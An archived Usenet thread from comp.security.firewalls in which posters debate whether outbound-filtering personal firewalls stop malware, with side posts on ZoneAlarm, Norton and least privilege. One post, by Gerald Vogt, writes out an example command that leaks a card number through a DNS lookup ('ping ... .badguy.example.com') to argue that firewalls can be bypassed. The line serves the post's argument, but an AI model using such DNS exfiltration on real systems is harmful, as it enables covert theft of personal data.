From: Ansgar -59cobalt- Wiechers on 28 Nov 2007 12:59 In comp.security.firewalls RalfG <itsnotme(a)la-de-da.deda> wrote: > "Gerald Vogt" <vogt(a)spamcop.net> wrote: >> RalfG wrote: >>> firewall may have the ability to block -any- application from >>> sending email without explicit approval. Monitoring outbound traffic >>> also entails >> >> Still, any application can send email without explicit approval if it >> really wants to. That's the point which is usually not mentioned. > > In your preferred setup nothing prevents emails from being sent. With > an appropriate firewall the firewall can block emails from being sent > without user intervention. The user's mail client is allowed to send mail. %OTHER_PROGRAM% utilizes the user's mail client to send mail. How does the firewall prevent that? No, trying to intercept IPC and then let the user decide is not an option, because that kind of decision is *way* over a normal user's head. >>> differentiating the legitimate processes from suspicious ones or >>> spoofs. All firewalls are not equal, but if the firewall is doing >>> the job well it's not enough for a process to pretend to be >>> "iexplore.exe" in order to pass the firewall, it has to be >>> c:\program files\internet explorer\iexplore.exe, with additional >>> identifying information, be it a specific version number, CRC etc. >>> etc.. >> >> An what keeps the malware from using the original IE to send out its >> data? > > In your setup nothing, with many firewalls nothing as well, however > there are firewalls which do monitor all processes that try to start > other processes. There's exactly no need at all to do that. Software Restriction Policies already allow to define which programs may or may not be executed. >>> Viruses aren't smart, they're all constrained to operating within >>> specific program parameters. Some are more cleverly written than >>> others but the vast majority have already been beaten. >> >> Yes. But that's all. A single little bit cleverer malware sends out >> your credit card number through DNS. Your firewall does not help. It >> does not recognize it. You still need more effective means to protect >> your data which no security suite can provide. > > You're basing your argument on a hypothetical malware and deficient AV > and firewall apps. Sorry, that strawman logic doesn't work. One of the > reasons for monitoring outbound traffic is precisely to stop > unrecognized processes from making connections, either to the internet > or to other nodes on a LAN. Instead of restricting the communication of unrecognized processes you want to prevent unrecognized processes from being started in the first place. That's what AV software and SRP do. > Firewall X might do this better than Firewall Y, Firewall Z might not > do it at all. Y may not be as good a firewall as X but it is still > better than Z, and even Z is better than nothing at all. Wrong, because this neglects the existence of exploitable bugs and design flaws in the firewall software as well as the possibility of intelligent malware. >>> Anyway this thread seems to be missing the point. It's analagous to >>> saying that we shouldn't bother using crosswalks or crossing at the >>> lights because it is always possible that some idiot driver might >>> ignore the signals and run us down anyway. One side (anti-security) >>> says avoid the problem by never crossing a street, the other side >>> (pro-security) says use due caution and >> >> No. That is the wrong analogy. Noone ever said you can never cross >> the street. >> >> You say you have to install security firewall, i.e. you have to cross >> the street with the security installed, i.e. at the lights. You must >> not cross the street at any other place (i.e. without security) >> because you will be killed, i.e. it is impossible to cross the >> street at any other place except at the lights. > > I never suggested certainty. The whole computer security issue is > about probabilities. No. Computer security is about reliability. Which may very well be based on probabilities, but only if you have some hard numbers. Which numbers are the probabilities you're talking about based on? > There is a greater probability of being hit by traffic if you don't > use the crosswalks just as there is a greater probability of falling > victim to malware if you don't use security software. Pointless, unless you are able to quantify that. cu 59cobalt -- "If a software developer ever believes a rootkit is a necessary part of their architecture they should go back and re-architect their solution." --Mark Russinovich
From: Gerald Vogt on 28 Nov 2007 18:31 RalfG wrote: > "Gerald Vogt" <vogt(a)spamcop.net> wrote in message > news:ex5$zCVMIHA.1164(a)TK2MSFTNGP02.phx.gbl... >> RalfG wrote: >>> It doesn't need to be a virus. I did encounter that one time when >>> accessing a web page unexpectedly triggered OE and the firewall blocked >>> it. A >> Which means again you went to that web page to start with. It was your >> action which brought you there. > > Normal usage of the computer for browsing, yes. Staying off of the internet > is almost certainly the best way to avoid trouble but that's just a tad self > defeating. I'll never understand why many people also jump to the "stay of the internet". No one said so. It is your conclusion that it is inevitable to come to such "bad" web pages. And that is simply not true. You can browse the internet and with still avoid most of those pages. >>> firewall may have the ability to block -any- application from sending >>> email without explicit approval. Monitoring outbound traffic also entails >> Still, any application can send email without explicit approval if it >> really wants to. That's the point which is usually not mentioned. > > In your preferred setup nothing prevents emails from being sent. With an > appropriate firewall > the firewall can block emails from being sent without user intervention. Yes. The firewall may be able to block emails from send with OE without user intervention. It cannot prevent some malware to put some mails into the outbox which is send out the next time the user sends something out. And it cannot prevent some malware sending out e-mail or other data bypassing the firewall. If you want to get something out you'll get it out even with the firewall in place. >>> differentiating the legitimate processes from suspicious ones or spoofs. >>> All firewalls are not equal, but if the firewall is doing the job well >>> it's not enough for a process to pretend to be "iexplore.exe" in order to >>> pass the firewall, it has to be c:\program files\internet >>> explorer\iexplore.exe, with additional identifying information, be it a >>> specific version number, CRC etc. etc.. >> An what keeps the malware from using the original IE to send out its data? > > In your setup nothing, with many firewalls nothing as well, however there > are firewalls > which do monitor all processes that try to start other processes. Many people have a browser running at all times. You don't need to start a process. You just have to make the other process do what you want. That's not so awfully difficult. >>> Viruses aren't smart, they're all constrained to operating within >>> specific program parameters. Some are more cleverly written than others >>> but the vast majority have already been beaten. >> Yes. But that's all. A single little bit cleverer malware sends out your >> credit card number through DNS. Your firewall does not help. It does not >> recognize it. You still need more effective means to protect your data >> which no security suite can provide. > > You're basing your argument on a hypothetical malware and deficient AV and > firewall apps. Sorry, that strawman logic doesn't work. One of the reasons > for monitoring outbound traffic is precisely to stop unrecognized processes > from making connections, either to the internet or to other nodes on a LAN. Again. IE, OE, and other installed applications on your computer are not unrecognized processes. ping for example is a standard application. You can simply enter ping VISA12341234123412340108RalfGGG.badguy.example.com And here goes your credit card... You'll never notice. At the same time you run another process which you let get caught by the firewall to make the user think it is all safe and he can continue... I don't have to use unrecognized processes to send data. And even "unrecognized processes" can trick the firewall. > Firewall X might do this better than Firewall Y, Firewall Z might not do it > at all. Y may not be as good a firewall as X but it is still better than Z, > and even Z is better than nothing at all. Good at blocking software you have installed and use to communicate: yes. Good at blocking malware effectively: no. >> You say you have to install security firewall, i.e. you have to cross the >> street with the security installed, i.e. at the lights. You must not cross >> the street at any other place (i.e. without security) because you will be >> killed, i.e. it is impossible to cross the street at any other place >> except at the lights. > > I never suggested certainty. The whole computer security issue is about > probabilities. There is a greater probability of being hit by traffic if you > don't use the crosswalks just as there is a greater probability of falling > victim to malware if you don't use security software. This is just plain wrong. I am far more safe if I open my eyes and make sure that it is safe to cross the street then to rely on traffic lights. Thus, why would you tell everybody to use the lights and it is absolutely essential to use the lights when there is a far more effective and safer method? >> you from being killed if all you do is to cross the street at the lights >> and never looking to the right or left. If you just start to walk when >> it's green you'll be eventually killed. There are a lot of nice drivers >> who stop at their red light but eventually you'll meet the one who does >> not. >> >> The alternative is not to rely on the lights. Don't trust the lights. The >> effective security is to switch on your brain and protect yourself looking >> to the left and right and making sure yourself it is safe to cross the >> street at this time and at this place. This effectively > > You just described using due caution. Which is far more effective security. >> That's the correct analogy if you want to use the "lights". Noone ever >> said you cannot cross the street. On the contrary. (I already know how you >> will now adjust your analogy but...) > > There's no need to adjust my analogy. You haven't yet made a compelling > argument in favour of your position.. and I doubt that accident statistics > will support your contentions either. :) You started that analogy. I did not adjust it. You described it wrong. The goal was to cross the street. You use security software as aid just like traffic lights are a aid for that. I say you don't need the lights. You don't need the security software. It is useless to discuss your analogy if you want the analogy to be that not using security software equals not crossing the street. Because you mix the aim with the tool which is supposed to help. >>> cross with the lights. I use a firewall mainly to keep >>> unauthorised -people- out of my PC, AV and AS software to keep out or >>> kill malicious software. >> Anything that comes on to your computer first of all got there because of >> your action, i.e. your "invitation". But none of the security suites >> really deals with this fact nor > > Blaming the victim? Yes. If a person refuses to learn about security. If a person thinks it only has to install a software suite to protect your computer. If a person thinks with security suite in place everything is done which one can possibly do to have security. If someone wants to dig in the dirt he'll get dirty. If you are concerned about the security of your computer and data you'll learn rules how to keep secure. Gerald
From: Otto Sykora on 28 Nov 2007 19:37 Yes Gerald, I know I should be kind of ashamed to belong still to the species who use ZA to some extend, but: >Why again does it happen to so many people that there >networking still does not work correctly after they have uninstalled >ZoneAlarm? The stupid uninstaller forgot to remove the proxy setting >in the internet settings... Hic. It was just not built to be >uninstalled. you are right , I can confirm it is so.
From: Victek on 30 Nov 2007 23:23 > My Zone Alarm Pro firewall subscription expires in a few days and I > recently bought a Norton Internet Security 2008 package that contains a > firewall. > I currently have the Norton firewall turned off and just use the Zone > Alarm Pro firewall. > I don't use the Win XP firewall because I heard that it's not a good idea > to have several firewall on at the same time. > We get internet through a Belkin pre-N wireless router that is supposed to > have some sort of firewall built in and that one is turned on. > My computer connects to the router with an ethernet cable and my son's > computer uses a Belkin N usb wireless adapter. They both have the same > current setup I describe regarding firewalls. > Can anyone please advise on whether the Zone Alarm Pro firewall is any > better than the Norton firewall in my situation? > Should I renew the Zone Alarm Pro subscription or uninstall it when it > expires and turn on the Norton firewall? > Thanks for any advice. Specifically with regard to your question I think an important part of the answer is which firewall software you are more comfortable with. By that I mean which product's interface and features make the most sense? Firewalls have many features which can be often be configured in multiple ways. The more you understand the product the more likely you will configure it optimally and get the best protection. Zone Alarm is a good choice if you want to be involved. On the other hand, some folks prefer security software that requires as little user interaction as possible and the Norton products are a good choice in that case because by default they handle a lot of the decision making. I'm not familiar with the firewall included in NIS 2008 so I can't comment specifically on it, but it did get a very good review at pcmag.com. Hope this helps.
From: Sam Hobbs on 1 Dec 2007 00:40
"Kayman" <kaymanNoSpam(a)operamail.com> wrote in message news:1vmjr84gxn0np$.tn0yxpzuscii.dlg(a)40tude.net... > > It is important that administrators follow the rule of least privilege. Definitely. |